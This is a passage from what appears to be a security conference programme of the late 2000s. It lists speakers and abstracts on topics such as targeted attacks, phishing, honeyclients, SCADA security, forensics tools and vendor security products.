So you've got patching and anti-virus under control, you've got a good firewall and you've even set up an IDS. Are you safe yet? Maybe from bot-herders but what about other threats? This presentation will look at the threat of targeted attacks against your organisation. In particular the threat of targeted content based client attacks and how trust relationships inside your network are helping your attackers. The presentation will walk through attack scenarios that can defeat your traditional border defences to get in and once there find the goods and get out. This talk is intended for anyone involved with IT security including system administrators, network engineers, security professionals and standard operating environment builders.
 

Trusted Computing and its status in the real-world marketplace.
 
Ronald Perez - IBM Research Center
 

A presentation detailing the basic features of Trusted Computing and the various activities and initiatives taking place within the organisation, and what specifically IBM is doing in this space. This should give the audience a good idea of how and where these technologies are being deployed, as well as what to expect in the near future and what some of the major issues are.

A presentation that delivers generic information on Trusted Computing and that group's global activities will likely be very well received indeed.

I believe that our audience will want to know where Trusted Computing is up to in the real-world marketplace, i.e. when can we expect to see it in widespread deployment?

 

The Software Security Landscape - Making Security Measurable
 
Bob Martin and Steve Christey - MITRE
 
The security and integrity of information systems has become a critical issue within most types of organizations, and finding better ways to address the topic has become the objective of many in industry, academia, and government. One of the more effective approaches gaining popularity in addressing these issues is the use of standard knowledge representations, enumerations, exchange formats and languages, as well as sharing of standard approaches to key compliance and conformance mandates. Leveraging these sorts of standards helps answer today's increased demands for accountability, efficiency and interoperability without artificially constraining options for technologies, solutions or vendors with respect to the interfaces and data representations they use internally and for external interaction with operational, development and sustainment tools and processes.

There are a large number of security measurement and management activities and initiatives being pursued by a variety of groups including public standards groups, industry associations, academia, and government. This presentation will describe a cross-section of this software security landscape and explore how many of these efforts are actually mutually supportive, well aligned, and complementary. Together these efforts compose major segments of a comprehensive approach to economically addressing the software development, systems operation, and accreditation/reporting needs of today's corporations, governments, and economies.  The security, integrity, and trustworthiness of the information technology capabilities of our society's critical infrastructure and commerce capabilities are totally dependent on software, networks, and information. Improving the security and manageability of these elements will be beneficial to all.

 

Introducing F.E.D.S - The Forensic Examiner's Database Scalpel
 
Dave Litchfield - NGS Software
 

FEDS is a breach investigation tool designed to expedite the discovery of evidence after a compromise of a database server. This talk will introduce the main features of FEDS and show how it can be used to show who did what and when.

 

Things That Make Us Dumb: Why Security User Interfaces lead to Insecure User Actions
 
Peter Gutmann - University of Auckland
 

Donald Norman's book "Things That Make Us Smart" (a follow-on to his classic "The Design of Everyday Things") looks at how appropriately-designed technology can help humans accomplish tasks and achieve goals.  Unfortunately technology isn't always appropriately designed, and can have quite the opposite effect to the one intended.  One area where this has proven particularly problematic is security user interfaces, where the design is purely by geeks for geeks.  This talk examines the how and why of the destructive interaction between the way normal humans do things and the user interfaces that are typically used to present computer security information to users.

 

What have you done for us lately? What your ISP can, and should do in the fight against internet abuse
 
Scott McIntyre - XS4ALL
 

You're working hard on defending your network, and your ISP is just your link to the internet, right? Wrong!

In this presentation, Scott will discuss the continuously evolving threat landscape and how this affects ISPs and you. Scott will also touch on the way XS4ALL has grown a business model with security and abuse handling built in.

Focusing on specific developments over the last year, you'll hear about some of the latest trends in malware and what Internet providers can and are doing to help with overall Internet security.

Highlighting the many types of resources which are being actively abused (home computers, servers, routers), Scott will touch on some of the key threats these systems face, and how to minimise the risks.

Today's top threats are increasingly motivated by financial gain and Scott will give a glimpse into some of this underground economy throughout his talk.

Finally, Scott will use case studies to illustrate the procedures that XS4ALL has in place to detect and mitigate security incidents on its network. Of course, this also has a direct effect on the security of its customers' networks. You will gain an understanding of the role an ISP can play in defending your network.

 

Infrastructure Security and Internet Incident Response
 
Danny McPherson - Chief Research Officer, Arbor Networks
 

This session will provide a discussion of the Infrastructure Security Survey results, to include details on deployment and implementation of popular attack detection and mitigation techniques, common attack vectors, attack scale and related trends.

We'll also provide an incident response methodology and information regarding structure and organizational points of contact for issues with various Internet domain name operators and IP address space administrators. Some useful tools and data repositories related to these topics will also be discussed. Finally, we'll discuss many of the challenges (legal, technical and economic) with SPs taking action to mitigate bot and other Internet security threats.

 

Phishing and Pharming (and the Future)
 
Sid Stamm - Indiana University
 

Stealing identity by means of Phishing or Pharming is a growing threat, and we are furiously working to keep ahead of the criminals. The threat is changing, and becoming more complex with techniques such as distributed phishing attacks, router bot networks, vishing and rock phishing. Sid Stamm will discuss cutting edge research on attacks and countermeasures, and describe where he sees the attacks going in the future.

 

V-Next Honeyclients : Evolving Revolvers - Discover them before they discover you
 
Stephan Chenette - Websense
 

A lot has changed since honeyclients were first used for mining the web for malicious code back in early 2000. This session will examine JavaScript obfuscation, polymorphic script, client and IP detection, shell exploits, Web 2.0 attacks, and detection avoidance. Examples of common, and not so common, web attacks will be presented - and how to discover them before they discover you.

 

Malware Without Borders: A Regional Look at Microsoft's Malware Telemetry Covering the APAC Region
 
Ziv Mador - Microsoft
 
As malware and potentially unwanted software are becoming motivated more and more by financial gain, their nature is also changing. The attackers often use social engineering techniques to lure the user to run their code and usually will show some messages or bogus warnings using some language. The effectiveness of the attack in any specific region will then rely on the popularity of that language in that region. Other factors may impact too, such as the level of user education in that region and the usage of security products there. The result is that we see more and more threats that affect specific countries or regions more than they affect others. This paper will overview some major differences in the types of malware and spyware that exist in different regions around the Asia Pacific region and will provide specific examples. The information for this paper is collected from hundreds of millions of computers around the world, though insights specific to the Asia Pacific region will be the focus of this presentation. Given the locality of many of the threats, the model of national response teams and organizational response teams can be extremely helpful. The paper is going to call for an even higher level of interaction between these response teams and the security software industry, and present several working examples which illustrate success.
 

Security As If Your Life Depended On It (because it might!)
 
Dan Klein
 

If my computer crashes, it's not the end of the world - it just seems that way sometimes, when I lose 3+ hours of work. But computers are appearing everywhere - in our phones, cars, airplanes, medical devices and urban infrastructure in more ways than we imagine, and they are networked in more ways than we know.

Our telephone network is becoming more and more IP based.  Generators and power systems are on the internet for "maintenance and diagnostic purposes", but they are also the targets of hackers (with catastrophic consequences).  The new Boeing 787 will have in-flight internet access at each seat, but the same network will be connected to the avionics.  Pacemakers can be hacked wirelessly.  Suddenly a computer crash threatens more than 3 hours of work, it threatens my life!  And while man-rated systems are rigorously tested for proper functioning, it is much harder to prove the negative that "you can't break in".

This talk will look at some fundamental assumptions about security that cannot be addressed with the "patch it in the next release" mentality - we have to get it right the first time.  What I hope to convey is that Security (and paranoia) has to be a lifestyle choice and not just your job.  And as security professionals, we need to convince everyone that there are no shortcuts - because the shortest path from 35,000 feet is straight down.

 

Adventures in Disclosure: A Look at the Legal Exploit Sales Market
 
Charles Miller - Independent Security Evaluators
 

This talk will focus on the topic of vulnerability disclosure from the perspective of a security researcher. The different forms of disclosure as well as researcher motivations will be discussed. Significant time will be spent on the legal exploit sales market. A few case studies involving disclosures I've made will be addressed. The talk will culminate in a discussion of the implications of these topics on Internet security in general.

 

Identity Monitoring – Know What They Did Last Night
 
Colby DeRodeff - WhiteGold Solutions
 

When protecting your business, regardless of your vertical, it is important to not only look at perimeter threats but also the threat that internal "trusted" users pose to your organization. User activity monitoring is meant not to violate the trust that you have for your employees but to ensure that your "crown jewels" are protected. What are the crown jewels? These days it's data: whether company information or credit card numbers, it's all valuable, and it lives within databases and is accessed through applications. This is why it is extremely important to monitor data access through these parts of the enterprise. This presentation takes an in-depth look at challenges, mistakes and how to accomplish this feat using security information management solutions as a platform to solve this complex issue. Included in the presentation are real life use-cases showing the benefits of this bleeding edge integration.

 

Making a security professional's life easier!
 
Andrew Kelly and Guy Lupo - CA
 

One of the major pains for the modern security professional is compliance. It has to be done but takes up an inordinate amount of time and resources to make sure the auditors are happy. The ideal solution would automate compliance-related security processes, especially in access and approval management, i.e. automating the access reviews.

Enter CA's Melbourne-based IAM Research and Development Centre - a world-leading developer of innovative identity management and compliance solutions. Learn why CA entrusted a new flagship identity compliance product to the Melbourne labs and how this product is helping organizations, both locally and globally, be secure and comply with legislation.

You be the judge about whether this new solution is ahead of the pack.

 

Identity Validation and Ad-hoc File Transfer
 
Hari Nair - Tumbleweed
 

Identity Validation:
The Tumbleweed Validation Authority suite of Identity Management products has been deployed across the world for more than 10 years, making it the most mature solution in the market. What makes it the market leader? This 20 minute presentation will cover the fundamental concepts of certificate validation. Traditional and new deployment models for validation of PKI-based credentialing systems will be discussed using case studies from different segments of the market.

Ad-hoc File Transfer:
Managed file transfer is a rapidly growing segment in Enterprise Security, one in which Tumbleweed has established a reputation as a market leader. Now, by integrating this technology with our award-winning range of email security products, we are also addressing the need for an ad-hoc file transfer solution. This 15 minute presentation will attempt to provide insight into what to look for when evaluating the myriad of attachment-offloading solutions available today.

 

Fear, Uncertainty and the Digital Armageddon
 
Morgan Marquis-Boire - Dimension Data
 

We now live in an age where attacks on critical infrastructure can cause real world harm. An increasing global concern regarding cyber-terrorism reflects the problem critical infrastructure security poses for many large IT consulting companies, telecommunications providers, utilities and industrial companies.

Speaking as a representative of Dimension Data and Datacraft, Morgan Marquis-Boire will provide an introduction to critical infrastructure environments and SCADA networks, and the major differences that exist between understood security best practice and the protective measures regularly found (or not found) in these networks.

The most common security mistakes and real world examples will be covered, which will expose some of the potentially catastrophic consequences of a failure in a production SCADA environment. There will be an examination of the critical infrastructure hysteria which is currently in vogue and some consideration of steps which can be taken to secure these networks and prevent cyber-terrorism.

 

Presentation to be announced
 
- b-sec/Deloittes
 

 

Components of the Digital Investigation Challenge
 
Trey Tramonte and John Fatten - Fulcrum Management
 

When your teams have to deal with data theft, fraud, sexual harassment, Sarbanes-Oxley, unfair dismissal and cyber attacks your First Responders need the right procedures, training and tools to secure the electronic evidence. Fulcrum Management is the premier supplier of Computer Forensic technology, tools and training services in Australia, New Zealand and parts of SE Asia.

Since 1987, AccessData tools have become standard issue for computer forensic investigators all over the world.

Introducing AccessData’s Digital Forensic Toolkit for Internal Litigation Preparedness. AccessData eDiscovery facilitates a project management approach to electronic discovery and streamlines the eDiscovery processes from the point of litigation hold all the way to production.

 

Targeted Attacks: An Evolution
 
Mark Sunner - MessageLabs
 

Towards the end of 2007, MessageLabs saw a dramatic shift in the profile of targeted attacks heading towards a global audience. In just 12 months the average number of interceptions we were making went from an average of around ten per day to several thousand per hour. Something had obviously changed within the threat landscape and the change was significant.

In this presentation we will examine how the threat landscape as a whole shifted in 2007 looking at spam, virus and phishing profiles and how they themselves also started to target more precisely their intended audiences. We will look closely at the exact evolution of targeted Trojans and the shadow economy that is fuelling targeted Trojan growth. Finally we will see how the recent explosion of social networking sites available is actually playing directly into the hands of the bad guys by yielding a ripe source of up-to-date data from which they can craft more socially engineered attacks.

 

Network Security Consolidation with Fortinet
 
Anthony James - Fortinet
 

As an IT professional concerned with network security, you are confronted by a constantly-evolving array of threats and increasing compliance requirements. But you have to balance your ability to manage this dynamic threat-scape against many other imperatives, including cost (both CapEx and OpEx), limited power and data center space, manageability, and increasing environmental concerns.

This presentation provides guidance and real world examples on how network security consolidation using a unified security solution platform can help you address these challenges and deliver a more effective security architecture aligned with business requirements, with notable cost savings and a reduced physical, power and environmental footprint.

 

An Executive Approach to Security
 
Timothy Dole - Tier-3
 

Today IT and business executives are struggling to understand how to better leverage their security spend to achieve business requirements for security.

With an understanding of the start and finish to security, organizations can better prioritise requirements relevant to their specific business. A security roadmap aligned to the business allows organizations to better direct funding, quickly respond to changing business requirements and accurately define security budgets.

With a clearly defined security framework and roadmap organizations can engage technology partners strategically, better leveraging their IT spend to achieve corporate security objectives rather than opting for point solutions.

This session discusses why executives are struggling with security compliance and talks about how to ease the pain.

 

Using Reputation to Beat Next-Gen Malware
 
Mike Bessey - IronPort Systems
 

Iframes and cross-site scripting can lead users to objects that aren't caught by signature or heuristics-based scans. IronPort has found a way to use its huge reputation database to prevent PCs from becoming bots or victims of malware attacks. In this session we'll explore zero-day blended threats, how behaviour and reputation can complement traditional signature scanning, and how you can prevent your users from picking up nasty infections as they surf the web. This session examines the extra risks posed by encryption, double flux and reputation theft.

This session will also explain how IronPort's market-leading success in email security made it possible to improve web security. Finally, we'll describe how IronPort's email and web reputation technology is impacting other Cisco product families.

 

The Perfect Storm! - Security Today
 
Adam Biviano - Trend Micro
 

Threats to your information assets have recently taken a turn for the worse. No longer are we facing bored hackers making a name for themselves, but highly structured and well funded groups of attackers. We need to understand how individual threat techniques learned from the past have combined to form the perfect storm. Vendors can no longer rely on creating iterations of traditional technologies but need to look